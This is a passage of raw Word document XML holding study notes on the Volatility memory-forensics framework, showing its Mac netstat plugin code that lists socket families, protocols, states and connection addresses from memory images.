      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">socket </w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> filp</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>f_fglob</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA6190">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fg_data</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dereference_as</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"socket"</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C7262" w:rsidRDefault="003C7262" w:rsidP="003C7262">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc445313269"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>msgbuf</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w:rsidR="003C7262" w:rsidRDefault="003C7262" w:rsidP="003C7262">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_Toc445313270"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>msgbuf</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p w:rsidR="003C7262" w:rsidRDefault="00AA6190" w:rsidP="003C7262">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="_Toc445313271"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>netstat info</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C7262" w:rsidRDefault="007279AA" w:rsidP="00604427">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>M:\Work\Mac_All\Mac_source\volatility-master\volatility\plugins\mac\netstat.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007279AA" w:rsidRPr="007279AA" w:rsidRDefault="007279AA" w:rsidP="007279AA">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>def</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> netstat</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>self</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for</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filp</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> _</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> _</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n</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lsof</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f</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> filp</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>f_fglob</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">fg_type </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color w:val="800080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'DTYPE_SOCKET'</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socket </w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> filp</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>f_fglob</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA6190">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fg_data</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dereference_as</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"socket"</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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lastRenderedPageBreak/>
        <w:t xml:space="preserve">               family </w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> socket</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>family</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f</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> family </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color w:val="008080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</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upcb </w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> socket</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>so_pcb</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dereference_as</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"unpcb"</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path </w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> upcb</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>unp_addr</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sun_path</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yield</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family</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socket</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(),</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> path</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elif</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> family </w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>in</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color w:val="008080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2</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color w:val="008080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>30</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proto </w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> socket</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>protocol</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state </w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> socket</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>state</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lip</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> lport</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> rip</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> rport</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 xml:space="preserve"> socket</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>get_connection_info</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yield</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family</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socket</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> proto</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> lip</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> lport</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> rip</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> rport</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
